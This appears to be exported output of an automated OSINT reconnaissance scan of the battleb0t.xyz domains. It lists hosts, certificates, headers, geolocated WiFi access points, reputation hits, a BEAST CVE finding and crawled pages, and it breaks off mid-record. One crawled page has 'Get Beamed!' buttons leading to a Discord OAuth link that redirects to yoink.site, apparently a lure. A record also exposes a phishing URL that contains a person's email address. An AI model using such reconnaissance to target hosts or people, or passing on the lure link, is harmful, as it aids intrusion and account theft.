29:c9:4e:6f:ae:1d:31:a2:f5:71:7f:a1:e1:58:17:ea:74:b0:
26:53:2b:a4:97:e8:9a:a1:10:a9:a5:e1:7b:21:18:15:30:ae:
dd:15:ba:8d
|
| 2023-05-12 03:22:23 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | GitHub (Category: coding)
https://github.com/battleb0t | battleb0t |
| 2023-05-12 03:08:49 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 35.229.48.113 | 35.229.48.116 |
| 2023-05-12 03:09:34 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 213.30.196.104.bc.googleusercontent.com | 104.196.30.213 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:04:5A:0E:F4:FC) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:37:29 | Malicious IP Address | Yes | MetaDefender | 0 | 1 | 3 | 0 | None | webroot.com [207.154.228.169] | 207.154.228.169 |
| 2023-05-12 03:41:36 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 3 | 0 | None | {u'city': u'Eygelshoven', u'security': {u'is_vpn': False}, u'city_geoname_id': 2756285, u'region_geoname_id': 2751596, u'country': u'Netherlands', u'region': u'Limburg', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'SYNLINQ', u'isp_name': u'CSH LLC', u'organization_name': u'CSH', u'autonomous_system_number': 44486}, u'continent_code': u'EU', u'currency': {u'currency_name': u'Euros', u'currency_code': u'EUR'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/NL_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/NL_flag.png', u'unicode': u'U+1F1F3 U+1F1F1', u'emoji': u'\U0001f1f3\U0001f1f1'}, u'postal_code': u'6471', u'longitude': 6.0563, u'country_code': u'NL', u'timezone': {u'abbreviation': u'CEST', u'gmt_offset': 2, u'is_dst': True, u'name': u'Europe/Amsterdam', u'current_time': u'05:41:35'}, u'latitude': 50.8897, u'country_geoname_id': 2750405, u'continent_geoname_id': 6255148, u'country_is_eu': True, u'ip_address': u'45.131.109.53', u'continent': u'Europe', u'region_iso_code': u'LI'} | 45.131.109.53 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | no_ssid (Net ID: 00:00:AA:A0:63:98) | 41.8781, -87.6298 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/nwp.PNG | https://funny.battleb0t.xyz/ |
| 2023-05-12 03:24:22 | Web Content | No | Web Spider | 2 | 0 | 4 | 0 | None | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f8c5eeb1a42bf')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=VqQIpv85XrbB73FISUPAb3YOKzrkafpohMHe42yb99c-1683861862-0-gaNycGzNChA" method="POST" enctype="application/x-www-form-urlencoded">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cNounce: '2801',
cRay: '7c5f8c5eeb1a42bf',
cHash: '66932cb8b087b32',
cUPMDTk: "\/?__cf_chl_tk=VqQIpv85XrbB73FISUPAb3YOKzrkafpohMHe42yb99c-1683861862-0-gaNycGzNChA",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei8=',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: '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',
t: 'MTY4Mzg2MTg2Mi4yMjQwMDA=',
m: 'kADszgADVaHA/mRyw7h+MKSs6RoLc0QTNBq8+AYYMs8=',
i1: 'q0RPvxk//GqHpe4FgiHvYg==',
i2: 'CV688EYHriA2UWvDyWxv3g==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'MOFk2Z71D85oDgM12X+iKPzOW00XacPzwtfsLetPJXU=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f8c5eeb1a42bf');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f8c5eeb1a42bf';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=VqQIpv85XrbB73FISUPAb3YOKzrkafpohMHe42yb99c-1683861862-0-gaNycGzNChA" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
| https://ayhu.xyz/?__cf_chl_f_tk=VqQIpv85XrbB73FISUPAb3YOKzrkafpohMHe42yb99c-1683861862-0-gaNycGzNChA |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | TotalWar (Category: gaming)
https://forums.totalwar.com/profile/login | login |
| 2023-05-12 03:09:48 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 75.170.74.34.bc.googleusercontent.com | 34.74.170.75 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | gclabc (Net ID: 00:0B:86:22:0F:31) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gKkAv2ueXH0GbQQgHQUB1ba%2FGC57%2Fw1l33qylJQZwo8rZZSQGe9chbhvY39IMKx8OGwCgg014ANieMLMNm0k2vb6aYv4qeDTvVzmiQmtAm9hGZFwG%2BXVyUTLjJ6w5y8UPVYOV9MG"}],"group":"cf-nel","max_age":604800} | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "x-powered-by": "Express", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "content-encoding": "gzip", "server": "cloudflare", "last-modified": "Tue, 01 Jan 1980 00:00:01 GMT", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=gKkAv2ueXH0GbQQgHQUB1ba%2FGC57%2Fw1l33qylJQZwo8rZZSQGe9chbhvY39IMKx8OGwCgg014ANieMLMNm0k2vb6aYv4qeDTvVzmiQmtAm9hGZFwG%2BXVyUTLjJ6w5y8UPVYOV9MG\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0", "date": "Fri, 12 May 2023 02:54:18 GMT", "cf-ray": "7c5f6051f8c478df-EWR", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "content-type": "text/html; charset=UTF-8"} |
| 2023-05-12 02:44:24 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | kekw.battleb0t.xyz | CN=kekw.battleb0t.xyz |
| 2023-05-12 03:43:57 | URL (Form) | No | Page Information | 0 | 0 | 5 | 0 | None | https://ayhu.xyz/?__cf_chl_f_tk=VqQIpv85XrbB73FISUPAb3YOKzrkafpohMHe42yb99c-1683861862-0-gaNycGzNChA | <!DOCTYPE html>
|
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | jack (Net ID: 00:02:6F:66:E7:97) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | wireless (Net ID: 00:01:36:06:41:8A) | 52.3759, 4.8975 |
| 2023-05-12 03:01:30 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.53): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:13 | HTTP Status Code | No | Web Spider | 0 | 0 | 3 | 0 | None | 200 | https://battleb0t.xyz/./src/style.css?4 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BJNPSETUP (Net ID: 00:00:85:EB:4A:C2) | 37.7642, -122.3993 |
| 2023-05-12 03:00:26 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.8): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:01:16 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.142): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:39 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | | 185.199.109.153 |
| 2023-05-12 03:18:06 | Externally Hosted Javascript | No | Page Information | 0 | 0 | 3 | 0 | None | https://use.fontawesome.com/9dfc16ed6b.js | <!DOCTYPE html>
<html>
<head>
<title>Funny Forehead Gallery</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<script src="http://code.jquery.com/jquery-3.2.1.js" integrity="sha256-DZAnKJ/6XZ9si04Hgrsxu/8s717jcIzLy3oi35EouyE=" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<script src="https://use.fontawesome.com/9dfc16ed6b.js"></script>
<link rel="stylesheet" type="text/css" href="gallery.css">
<link rel="icon" type="image/png" href="/images/favicon.png">
</head>
<body>
<nav class = "nav navbar-inverse navbar-fixed-top">
<div class = "container">
<div class = "navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a href = "#" class = "navbar-brand"><span class="glyphicon glyphicon-picture" aria-hidden="true"></span> #WieselOnTop</a>
</div>
</nav>
<div class = "container">
<div class = "jumbotron">
<h1><i class="fa fa-camera-retro" aria-hidden="true"></i> The Funny Forehead Gallery</h1>
<p>A bunch of beautiful images!</p>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Join the Discord</a>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Get Beamed!</a>
</div>
<div class = "row">
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_3.JPG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nomnom.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/fredo.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jonas.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_1.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_3.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/reveloder.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_2.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_4.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_5.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_1.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_2.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_4.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_5.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_6.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jcqn.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nwp.PNG">
</div>
</div>
</div>
</body>
</html>
|
| 2023-05-12 02:49:55 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:2c:84:3a:08:10:23:75:f2:8a:d5:a0:cb:cc:f6:da:14:6e
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 27 01:32:07 2022 GMT
Not After : Mar 27 01:32:06 2023 GMT
Subject: CN=fluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
63:4E:15:85:56:5A:A4:94:02:C2:16:42:A4:A5:97:9A:38:02:57:97
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:fluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
| battleb0t.xyz |
| 2023-05-12 03:11:16 | Physical Location | No | AbstractAPI | 0 | 0 | 2 | 0 | None | London, England, W1B, United States, North America | 2a06:98c1:3120::1 |
| 2023-05-12 03:11:42 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 1 | 3 | 0 | None | CVE-2011-3389
https://nvd.nist.gov/vuln/detail/CVE-2011-3389
Score: 4.3
Description: The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack. | panel.battleb0t.xyz |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | TOMTSSID (Net ID: 00:02:2D:76:6D:60) | 50.1188, 8.6843 |
| 2023-05-12 02:44:05 | SSL Certificate - Issued to | No | CertSpotter | 0 | 0 | 1 | 0 | None | CN=battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 02:54:38 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5ad40179b8e20f-ORD
Content-Encoding: gzip
| 172.67.168.252 |
| 2023-05-12 03:01:18 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.155): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:50:16 | Malicious IP Address | Yes | VirusTotal | 0 | 1 | 2 | 0 | None | VirusTotal [185.199.108.153]
https://www.virustotal.com/en/ip-address/185.199.108.153/information/ | 185.199.108.153 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | pannet-24 (Net ID: 00:01:8E:DA:59:C4) | 37.7813933,-122.3918002 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 218 5 (Net ID: 00:01:9F:34:7C:1C) | 34.0544, -118.244 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Sprint Drive (Net ID: 00:0A:F5:F9:D9:E8) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | DaltonInt (Net ID: 00:0A:04:99:14:E2) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ConnectionPoint (Net ID: 00:01:E3:4A:D6:05) | 52.3759, 4.8975 |
| 2023-05-12 03:01:34 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.107): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:55:11 | Software Used | Yes | Censys | 0 | 0 | 2 | 0 | None | Express | 87.248.157.102 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | redwood (Net ID: 00:01:38:85:C1:F8) | 37.780462,-122.390564 |
| 2023-05-12 03:13:01 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0-tikaro.github.io]
https://www.openphish.com/feed.txt | 0-tikaro.github.io |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 1 | 4 | 0 | None | GitHub.com | {"content-length": "103646", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-63a06\"", "x-cache-hits": "0", "cache-control": "max-age=600", "x-served-by": "cache-ewr18167-EWR", "x-cache": "MISS", "x-github-request-id": "70D2:0CB6:1A723F4:28AE86F:645DAA55", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 03:04:13 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "4232179a2468cad7d8e788f0a4fe958396bfc091", "date": "Fri, 12 May 2023 02:54:13 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "0", "x-timer": "S1683860053.050131,VS0,VE21", "server": "GitHub.com", "connection": "keep-alive", "content-type": "application/javascript; charset=utf-8"} |
| 2023-05-12 03:43:29 | Country | No | Country Name Extractor | 0 | 0 | 6 | 0 | None | Germany | tjdev.de |
| 2023-05-12 02:46:38 | BGP AS Membership | No | RIPE | 0 | 0 | 4 | 0 | None | 15169 | 104.196.16.0/20 |
| 2023-05-12 02:45:29 | Physical Location | No | ipapi.co | 1 | 0 | 3 | 0 | None | North Charleston, South Carolina, SC, United States, US | 104.196.30.220 |
| 2023-05-12 02:54:00 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["7c594d129a872998-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 104.21.6.166 |
| 2023-05-12 03:00:26 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.4): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:01:40 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.185): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:44:13 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 1 | 2 | 0 | None | githubusercontent.com | www.battleb0t.xyz |
| 2023-05-12 03:10:22 | Blacklisted IP Address | Yes | Threat Jammer | 0 | 1 | 2 | 0 | None | Threat Jammer - Risk score: 40 (MEDIUM)
https://threatjammer.com/info/188.114.96.1 | 188.114.96.1 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | jbnowires (Net ID: 00:0C:41:B5:31:DD) | 39.0469, -77.4903 |
| 2023-05-12 02:54:34 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 104.21.71.14:8443 | 104.21.71.14 |
| 2023-05-12 02:53:17 | IP Address | No | Mnemonic PassiveDNS | 72 | 0 | 1 | 0 | None | 188.114.97.1 | ayhu.xyz |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | cross-origin-opener-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=fiT%2Fr8CwWrAQPZkt8VpkeQoVoGOR6HuHPRasaTPIcW93tfGJar9pTikOfGdSWQA5SZHUpCyuk56gghqLlY9yU5dVDbV5Bs9yRYYuQ0D9hZe3tyWEFUstq9XRCg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c594cb34339-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:46:38 | BGP AS Membership | No | RIPE | 0 | 0 | 4 | 0 | None | 14061 | 64.226.80.0/20 |
| 2023-05-12 02:47:03 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}, {u'url': u'https://zip.co/us/quadpay-terms-of-service', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 20, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://llink.to/?u=https%3A%2F%2Frabetsanatkoosha.com%2FSNS%2Fcdfa.ca.gov%2Ferika.lewis%40cdfa.ca.gov', u'signatures': [{u'category': u'General', u'origin': u'API Call', u'identifier': u'api-7', u'name': u'Loads modules at runtime', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1129', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1129', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" loaded module "KERNEL32" at base ca950000\n "msedge.exe" loaded module "API-MS-WIN-CORE-STRING-L1-1-0" at base c98b0000\n "msedge.exe" loaded module "API-MS-WIN-CORE-DATETIME-L1-1-1" at base c98b0000\n "msedge.exe" loaded module "API-MS-WIN-CORE-LOCALIZATION-OBSOLETE-L1-2-0" at base c98b0000\n "msedge.exe" loaded module "%WINDIR%\\SYSTEM32\\IMM32.DLL" at base cd050000\n "msedge.exe" loaded module "API-MS-WIN-CORE-SYNCH-L1-2-0" at base c98b0000\n "msedge.exe" loaded module "API-MS-WIN-CORE-FIBERS-L1-1-1" at base c98b0000\n "msedge.exe" loaded module "API-MS-WIN-CORE-LOCALIZATION-L1-2-1" at base c98b0000\n "msedge.exe" loaded module "%WINDIR%\\SYSTEM32\\UXTHEME.DLL" at base c7b80000\n "msedge.exe" loaded module "COMBASE.DLL" at base ccbb0000\n "msedge.exe" loaded module "API-MS-WIN-DOWNLEVEL-SHELL32-L1-1-0.DLL" at base cad70000\n "msedge.exe" loaded module "SHELL32.DLL" at base cb680000\n "msedge.exe" loaded module "USER32.DLL" at base ccec0000\n 
